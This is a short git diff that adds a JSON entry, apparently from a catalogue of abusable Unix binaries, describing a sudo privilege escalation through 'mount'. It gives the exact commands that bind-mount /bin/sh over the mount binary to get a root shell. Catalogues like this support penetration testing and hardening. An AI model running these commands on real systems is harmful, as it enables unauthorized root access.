diff --git a/data/mount.json b/data/mount.json new file mode 100644 index 0000000..a3b0c37 --- /dev/null +++ b/data/mount.json @@ -0,0 +1,10 @@ +{ + "functions": { + "sudo": [ + { + "description": "Exploit the fact that 'mount' can be executed via 'sudo' to replace the 'mount' binary with a shell.", + "code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n" + } + ] + } +} \ No newline at end of file